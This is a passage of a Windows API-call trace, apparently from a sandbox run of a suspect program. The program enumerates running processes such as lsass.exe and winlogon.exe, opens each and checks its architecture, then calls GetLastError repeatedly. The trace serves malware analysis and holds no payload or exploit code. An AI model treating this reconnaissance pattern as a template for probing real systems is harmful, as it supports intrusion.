	[0072.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.287] CloseHandle (hObject=0x224) returned 1
	[0072.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.288] CloseHandle (hObject=0x224) returned 1
	[0072.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.288] CloseHandle (hObject=0x224) returned 1
	[0072.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.288] CloseHandle (hObject=0x224) returned 1
	[0072.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.289] CloseHandle (hObject=0x224) returned 1
	[0072.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.289] CloseHandle (hObject=0x224) returned 1
	[0072.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a58, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.289] CloseHandle (hObject=0x224) returned 1
	[0072.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.289] CloseHandle (hObject=0x224) returned 1
	[0072.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.290] CloseHandle (hObject=0x224) returned 1
	[0072.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.290] CloseHandle (hObject=0x224) returned 1
	[0072.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.290] CloseHandle (hObject=0x224) returned 1
	[0072.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.290] CloseHandle (hObject=0x224) returned 1
	[0072.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.290] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.291] CloseHandle (hObject=0x224) returned 1
	[0072.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.291] CloseHandle (hObject=0x224) returned 1
	[0072.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7289b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.291] CloseHandle (hObject=0x224) returned 1
	[0072.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eab8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.291] CloseHandle (hObject=0x224) returned 1
	[0072.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.291] CloseHandle (hObject=0x224) returned 1
	[0072.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.291] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.291] CloseHandle (hObject=0x224) returned 1
	[0072.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.292] CloseHandle (hObject=0x224) returned 1
	[0072.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728878, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.292] CloseHandle (hObject=0x224) returned 1
	[0072.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728998, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.292] CloseHandle (hObject=0x224) returned 1
	[0072.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.292] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.292] CloseHandle (hObject=0x224) returned 1
	[0072.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.293] CloseHandle (hObject=0x224) returned 1
	[0072.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e8d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.293] CloseHandle (hObject=0x224) returned 1
	[0072.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.293] CloseHandle (hObject=0x224) returned 1
	[0072.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.293] CloseHandle (hObject=0x224) returned 1
	[0072.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.293] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.293] CloseHandle (hObject=0x224) returned 1
	[0072.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.294] CloseHandle (hObject=0x224) returned 1
	[0072.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728978, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.294] CloseHandle (hObject=0x224) returned 1
	[0072.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e888, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.294] CloseHandle (hObject=0x224) returned 1
	[0072.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea90, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.294] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.294] CloseHandle (hObject=0x224) returned 1
	[0072.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.294] GetLastError () returned 0x5
	[0072.294] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
	[0072.295] GetLastError () returned 0x5
